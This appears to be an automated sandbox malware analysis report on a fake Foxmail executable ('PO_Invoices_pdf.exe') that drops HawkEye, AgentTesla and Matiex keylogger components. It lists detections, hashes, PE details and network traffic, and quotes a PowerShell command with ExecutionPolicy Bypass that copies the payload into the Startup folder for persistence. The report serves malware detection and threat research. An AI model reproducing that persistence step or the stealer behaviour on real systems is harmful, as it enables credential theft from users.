                                                                                                  SHA-512:3AE6E49D3D728531201453A0BC27436B1A4305C8EF938B2CBB5E34EE45BB9A9A88CF2A41B08E4914FDA9A96BBAA48BD999A2D2F1DFFCD39761BB1F3620CA725F
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Arnim Rupp
                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: JPCERT/CC Incident Response Group
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: Orders.exe, Detection: malicious
                                                                                                  C:\Users\user\AppData\Local\Temp\holderwb.txt
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                  File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2
                                                                                                  Entropy (8bit):1.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                  Malicious:false
                                                                                                  Preview: ..
                                                                                                  C:\Users\user\AppData\Local\Temp\origigoods20.exe
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:modified
                                                                                                  Size (bytes):220672
                                                                                                  Entropy (8bit):6.057903449485828
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:SVQEat7UY8MnZGcqB5AyruUJ7XAzsNvEaEifv6yr9zRsc0qC4B0BUAE3vVAVvoUB:SytJqCUyQNX36yQqbB063cAUAW
                                                                                                  MD5:61DC57C6575E1F3F2AE14C1B332AD2FB
                                                                                                  SHA1:F52F34623048E5FD720E97A72EEDFD32358CD3A9
                                                                                                  SHA-256:1C7757EE223F2480FBC478AE2ECAF82E1D3C17F2E4D47581D3972416166C54AB
                                                                                                  SHA-512:81A7DB927F53660D3A04A161D5C18AAB17D676BCC7AE0738AB786D9BEE82B91016E54E6F70428AEC4087961744BE89B1511F9E07D8DABBE5C2A9D836722395A1
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: Metadefender, Detection: 43%
                                                                                                  • Antivirus: ReversingLabs, Detection: 86%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: Orders.exe, Detection: malicious
                                                                                                  C:\Users\user\AppData\Local\Temp\origigoods40.exe
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):221696
                                                                                                  Entropy (8bit):6.060343577776758
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:K9Wf3ouEAkhUxOCt+qqr3drw0tR5dUimnoSA7Mw4lY2hWYQQgGJrozRscS4+SOw6:KhuI3dlxUOt7IdWLOjCDUjU
                                                                                                  MD5:AE36F0D16230B9F41FFECBD3C5B1D660
                                                                                                  SHA1:88AFC2923D1EEFB70BAD3C0CD9304949954377EF
                                                                                                  SHA-256:CFAD1E486666FF3FB042BA0E9967634DE1065F1BBD505C61B3295E55705A2A50
                                                                                                  SHA-512:1E98AEE7DC693822113DCDE1446A5BED1C564B76EEF39F39F3A5D98D7D2099CF69AC92717A3297AFC7082203929F1E9437F21CB6BC690974A0EF6D6CF6E4393C
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: Metadefender, Detection: 43%
                                                                                                  • Antivirus: ReversingLabs, Detection: 82%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: Orders.exe, Detection: malicious
                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1655808
                                                                                                  Entropy (8bit):7.9413063895946845
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:MWHaK9/4HLz1lxNIFSCLulcJVzF+gr6b0XVULw:v6KirHxNPUVO0FULw
                                                                                                  MD5:59D7D8D5DD3E0055E7C0DCC75897F569
                                                                                                  SHA1:B249B28D088D54E971E2D9D8B2688440F8E6D513
                                                                                                  SHA-256:EF715CD322F0A805A68840B215C062F2E254977170A11C6800D836EAC781FABB
                                                                                                  SHA-512:79EBC2A128D018EB7E71B254FDD2FA72DEAE18081F1732619046E1DB9D1AEE92F7529521C005A5F861275AFCBDA3A39FD304CD5E1A49DF848675460C5CF8F30D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 20%
                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe:Zone.Identifier
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):26
                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                  Malicious:true
                                                                                                  Preview: [ZoneTransfer]....ZoneId=0
                                                                                                  C:\Users\user\AppData\Roaming\pid.txt
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\hawkgoods.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4
                                                                                                  Entropy (8bit):1.5
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Ezn:Ezn
                                                                                                  MD5:7A2347D96752880E3D58D72E9813CC14
                                                                                                  SHA1:1D3027412B106008F1A8094D747616D37F4AE1BB
                                                                                                  SHA-256:90F285F8FB15C8BC72A43D25CEA803491CC0FD0E97567CFF577A2CFA56CDE6F8
                                                                                                  SHA-512:96A7B7BE0B89097FC65BB75DD9B8B0DEB5063ED6990E27151A0A7E54C899AE69377E57ECB5728DFFAB657EE444244F833236F80EC6A98E449902DF9075C74ECE
                                                                                                  Malicious:false
                                                                                                  Preview: 5440
                                                                                                  C:\Users\user\AppData\Roaming\pidloc.txt
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\hawkgoods.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):50
                                                                                                  Entropy (8bit):4.6483674395583785
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:oNerbJSRE2J5xAI4F:oNe0i23f8
                                                                                                  MD5:0CE4A330E42C174E8E8CF4D81C6F46A6
                                                                                                  SHA1:D9CA3AD5CD90643DF99808D5FF0EC0E89E891FE0
                                                                                                  SHA-256:94ABDE13F36EBE4B4AC81A712597439918788FD90339594FA1DDD679E7DAD70A
                                                                                                  SHA-512:CE3453726B73A7423C69D94E4784966A6AA08381ABE9585AA323D0D80FAF63B3A31508B7083C3FEC6AB2727112573733D498F4F78389D75F64DDF6BABE581943
                                                                                                  Malicious:false
                                                                                                  Preview: C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe
                                                                                                  C:\Users\user\Documents\20210202\PowerShell_transcript.830021.dnDUrXav.20210202085254.txt
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4005
                                                                                                  Entropy (8bit):5.389111464999469
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:BZ0x6KNWwkqDo1ZSzwMZ06KNWwkqDo1ZCSdC3UC3UW3gZ8:wXO
                                                                                                  MD5:38990FC46C9A4B38D38D5B6B446DA280
                                                                                                  SHA1:6BAB83EC68E0E3232CCB544F489D69026F3FAB9C
                                                                                                  SHA-256:5CF4E546B058149AC9BBAA1B3B2CB29FFDC75EA82CFF37F287D818A567B0476B
                                                                                                  SHA-512:821C9C1FE957904DCCB563AB386978D98D5DF5A6DBF5EF196B3C2DB2DA74BF0D4784195B36CFA8C8A3AF4748FFEDFA5B3EA8359E322BDFE39477EDDCA372B8B4
                                                                                                  Malicious:false
                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210202085355..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 830021 (Microsoft Windows NT 10.0.17134.0)..Host Application: Powershell.exe -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'..Process ID: 6908..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210202085355..**********************..PS>Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.e
C:\Users\user\Documents\20210202\PowerShell_transcript.830021.vpu_jBUU.20210202085147.txt
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 1217
Entropy (8bit): 5.237238445417744
Encrypted: false
SSDEEP: 24:BxSAIdZOvBdaD+x2DOXCgxluVM5wWOHjeTKKjX4CIym1ZJX+luVM5lnxSAZa:BZHv6KoO/uojOqDYB1Zouo5ZZa
MD5: D400773C1D3FF7015F2BCC822734162A
SHA1: 299A9A913AEFDF415CB5515F9A09B05161264DEF
SHA-256: 37EBF08DC01B50660C9218D9FB98992D216DE77186933DC3E016B003328F07DF
SHA-512: B221B385406A51229AF6D022D209DDFE86BEA4DFF6E183B790307C18CDBE4C71633FD794C8AF13BBF825416732F6B38BBEE356F43D3D9C8DC384780BD5F5492F
Malicious: false
                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210202085211..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 830021 (Microsoft Windows NT 10.0.17134.0)..Host Application: Powershell.exe -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PO_Invoices_pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'..Process ID: 5904..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210202085211..**********************..PS>Copy-Item 'C:\Users\user\Desktop\PO_Invoices_pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.ex
C:\Users\user\Documents\Matiex Keylogger\Screenshot.png
Process: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
File Type: PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 4898647
Entropy (8bit): 7.944487996146186
Encrypted: false
SSDEEP: 98304:6HSa5z1aE+hDBoHSa5z1aE+hD2eHSa5z1aE+hD2eHSa5z1aE+hD2eHSa5z1aE+h/:nkz3Ckz3dkz3dkz3dkz3akz3W
MD5: 8C4D34A23BB01B274B0281197BAD0E4C
SHA1: AC9D537B161FCC2DEB326716CC499029D67A1EBD
SHA-256: 0B756492D0BA32BC2DB803986371A08AA9A5D6A46C859E3CA7204D12D1CBB123
SHA-512: 509D9D5D2A1F8EEBCC39D5568E5875635C4D3C78552539270F96894230246EB1ADD6021A202043DE1605F4BB70E3AF16DC741240253C7499C24FEFD3BE865582
Malicious: false
                                                                                                  Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....mGY.....__@.)..=t..y.. .....'.....A:R.$!.@z%.B.-....J...B...).R@Hg......;k.].....u}...)...{.g.l..=.-.........==kw.....e..~3bm.{.q..Zv.O.];v.o...{........cB:.+e....A.@.....l....vv."...Sv.5....]..X......Y.]...0~..#..c'......og.kc!k./h'.m...b..e..-HWG..U)]..2#.......^..g.vw.l..]...'.k.b.lz...c<.....oF.s!CR...a.{z......b@;%.zf.{+b..y!g...;.sw[......Q..>C.vv>.c...&>...7<........hm..7k{.V.=3...){>..b...=.4..f/{=.@.=..C.....d.$6q~.A....-....vo......w.n...O............!.;H9......w.........]..ac.Pvv.Q....bc*..........7...........S.W?..y."6.E}e.W.H?.Bm;X..,-..........i..dN.2r.S..h%....'..........7?3.c.@.p...)N.YL.!P.[..y..3e..E.T.o.......f.....g.Q.[..=....@}.Gr....@.}:V.`.+.0..|C.............!.;H9......w.........N.bc.P.\....Z`i......c...Z?.}T......J..g[.m..{..e...a..p.`...z...?!....0..psl..(.*.;.....N..`..........`.D.LjO'.....b.[p2..%"....-..b.?..q.\.....1.

Static File Info

General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.9413063895946845
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: PO_Invoices_pdf.exe
File size: 1655808
MD5: 59d7d8d5dd3e0055e7c0dcc75897f569
SHA1: b249b28d088d54e971e2d9d8b2688440f8e6d513
SHA256: ef715cd322f0a805a68840b215c062f2e254977170a11c6800d836eac781fabb
SHA512: 79ebc2a128d018eb7e71b254fdd2fa72deae18081f1732619046e1db9d1aee92f7529521c005a5f861275afcbda3a39fd304cd5e1a49df848675460c5cf8f30d
SSDEEP: 49152:MWHaK9/4HLz1lxNIFSCLulcJVzF+gr6b0XVULw:v6KirHxNPUVO0FULw
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............0......D......N.... ... ....@.. ....................................@................................

File Icon

Icon Hash: d0d2f8ccf6c4dad8

Static PE Info

General

Entrypoint: 0x591c4e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x601882D9 [Mon Feb 1 22:38:17 2021 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
(the line above is listed 97 times in the original disassembly: the bytes following the jmp are all zero, and the two-byte sequence 00 00 decodes to add byte ptr [eax], al)

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x191bf4 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x192000 | 0x4186 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x198000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x18fc54 | 0x18fe00 | False | 0.788759670991 | data | 7.94835272626 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x192000 | 0x4186 | 0x4200 | False | 0.507634943182 | data | 5.48483136325 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x198000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x192190 | 0x468 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x1925f8 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4286386453, next used block 4285534489 | |
RT_ICON | 0x1936a0 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4278198588, next used block 4278263872 | |
RT_GROUP_ICON | 0x195c48 | 0x30 | data | |
RT_VERSION | 0x195c78 | 0x324 | data | |
RT_MANIFEST | 0x195f9c | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

Imports

DLL | Import
mscoree.dll | _CorExeMain

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright (C) 2017
Assembly Version | 7.2.12.13
InternalName | Foxmail.exe
FileVersion | 7.2.12.13
CompanyName | Tencent Inc.
Comments | Foxmail 7.2
ProductName | Foxmail 7.2
ProductVersion | 7.2.12.13
FileDescription | Foxmail
OriginalFilename | Foxmail.exe

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/02/21-08:51:54.127437 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49729 | 104.16.155.36 | 192.168.2.7
02/02/21-08:51:54.375992 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49729 | 104.16.155.36 | 192.168.2.7
02/02/21-08:53:01.225853 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49769 | 104.16.155.36 | 192.168.2.7

Network Port Distribution

TCP Packets

Timestamp                           Source Port  Dest Port  Source IP       Dest IP
Feb 2, 2021 08:51:54.033477068 CET  49729        80         192.168.2.7     104.16.155.36
Feb 2, 2021 08:51:54.073527098 CET  80           49729      104.16.155.36   192.168.2.7
Feb 2, 2021 08:51:54.073673964 CET  49729        80         192.168.2.7     104.16.155.36
Feb 2, 2021 08:51:54.075356960 CET  49729        80         192.168.2.7     104.16.155.36
Feb 2, 2021 08:51:54.115274906 CET  80           49729      104.16.155.36   192.168.2.7
Feb 2, 2021 08:51:54.127437115 CET  80           49729      104.16.155.36   192.168.2.7
Feb 2, 2021 08:51:54.347234964 CET  49729        80         192.168.2.7     104.16.155.36
Feb 2, 2021 08:51:54.375992060 CET  80           49729      104.16.155.36   192.168.2.7
Feb 2, 2021 08:51:54.376856089 CET  49729        80         192.168.2.7     104.16.155.36
Feb 2, 2021 08:52:04.636801958 CET  49731        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:04.696549892 CET  80           49731      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:04.696633101 CET  49731        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:04.697185040 CET  49731        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:04.757730961 CET  80           49731      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:04.757770061 CET  80           49731      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:04.757795095 CET  80           49731      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:04.757899046 CET  49731        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:04.758519888 CET  49731        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:04.817929983 CET  80           49731      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:05.157845974 CET  49732        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:05.216881037 CET  80           49732      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:05.217084885 CET  49732        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:05.217569113 CET  49732        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:05.276770115 CET  80           49732      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:05.276901960 CET  80           49732      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:05.276920080 CET  80           49732      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:05.276995897 CET  49732        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:05.277327061 CET  49732        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:05.338064909 CET  80           49732      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:13.048981905 CET  49733        443        192.168.2.7     104.21.19.200
Feb 2, 2021 08:52:13.095045090 CET  443          49733      104.21.19.200   192.168.2.7
Feb 2, 2021 08:52:13.095906973 CET  49733        443        192.168.2.7     104.21.19.200
Feb 2, 2021 08:52:13.155304909 CET  49733        443        192.168.2.7     104.21.19.200
Feb 2, 2021 08:52:13.201467037 CET  443          49733      104.21.19.200   192.168.2.7
Feb 2, 2021 08:52:13.208401918 CET  443          49733      104.21.19.200   192.168.2.7
Feb 2, 2021 08:52:13.208453894 CET  443          49733      104.21.19.200   192.168.2.7
Feb 2, 2021 08:52:13.208547115 CET  49733        443        192.168.2.7     104.21.19.200
Feb 2, 2021 08:52:13.221199989 CET  49733        443        192.168.2.7     104.21.19.200
Feb 2, 2021 08:52:13.268449068 CET  443          49733      104.21.19.200   192.168.2.7
Feb 2, 2021 08:52:13.269627094 CET  443          49733      104.21.19.200   192.168.2.7
Feb 2, 2021 08:52:13.317687988 CET  49733        443        192.168.2.7     104.21.19.200
Feb 2, 2021 08:52:13.393908024 CET  49733        443        192.168.2.7     104.21.19.200
Feb 2, 2021 08:52:13.439867020 CET  443          49733      104.21.19.200   192.168.2.7
Feb 2, 2021 08:52:13.497458935 CET  443          49733      104.21.19.200   192.168.2.7
Feb 2, 2021 08:52:13.551959991 CET  49733        443        192.168.2.7     104.21.19.200
Feb 2, 2021 08:52:13.723737001 CET  49734        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:13.783137083 CET  80           49734      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:13.783849001 CET  49734        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:13.783994913 CET  49734        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:13.844903946 CET  80           49734      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:13.845175028 CET  80           49734      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:13.845184088 CET  80           49734      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:13.845391035 CET  49734        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:13.845911980 CET  49734        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:13.846653938 CET  49733        443        192.168.2.7     104.21.19.200
Feb 2, 2021 08:52:13.892366886 CET  443          49733      104.21.19.200   192.168.2.7
Feb 2, 2021 08:52:13.905188084 CET  80           49734      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:13.925117970 CET  443          49733      104.21.19.200   192.168.2.7
Feb 2, 2021 08:52:13.973860979 CET  49733        443        192.168.2.7     104.21.19.200
Feb 2, 2021 08:52:14.101875067 CET  49735        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:14.161318064 CET  80           49735      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:14.162257910 CET  49735        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:14.162292004 CET  49735        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:14.221921921 CET  80           49735      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:14.221944094 CET  80           49735      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:14.221972942 CET  80           49735      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:14.222125053 CET  49735        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:14.222654104 CET  49735        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:14.223448992 CET  49733        443        192.168.2.7     104.21.19.200
Feb 2, 2021 08:52:14.282454967 CET  80           49735      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:14.286712885 CET  443          49733      104.21.19.200   192.168.2.7
Feb 2, 2021 08:52:14.333252907 CET  49733        443        192.168.2.7     104.21.19.200
Feb 2, 2021 08:52:14.451637030 CET  49736        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:14.510814905 CET  80           49736      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:14.510978937 CET  49736        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:14.511794090 CET  49736        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:14.571150064 CET  80           49736      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:14.571176052 CET  80           49736      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:14.571185112 CET  80           49736      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:14.571312904 CET  49736        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:14.571866989 CET  49736        80         192.168.2.7     131.186.113.70
Feb 2, 2021 08:52:14.632783890 CET  80           49736      131.186.113.70  192.168.2.7
Feb 2, 2021 08:52:22.430808067 CET  49741        587        192.168.2.7     199.193.7.228
Feb 2, 2021 08:52:22.430866003 CET  49740        587        192.168.2.7     199.193.7.228
Feb 2, 2021 08:52:22.621337891 CET  587          49740      199.193.7.228   192.168.2.7
Feb 2, 2021 08:52:22.621368885 CET  587          49741      199.193.7.228   192.168.2.7
Feb 2, 2021 08:52:22.621531963 CET  49740        587        192.168.2.7     199.193.7.228
Feb 2, 2021 08:52:22.621571064 CET  49741        587        192.168.2.7     199.193.7.228
Feb 2, 2021 08:52:22.646863937 CET  49741        587        192.168.2.7     199.193.7.228
Feb 2, 2021 08:52:22.813158989 CET  587          49740      199.193.7.228   192.168.2.7
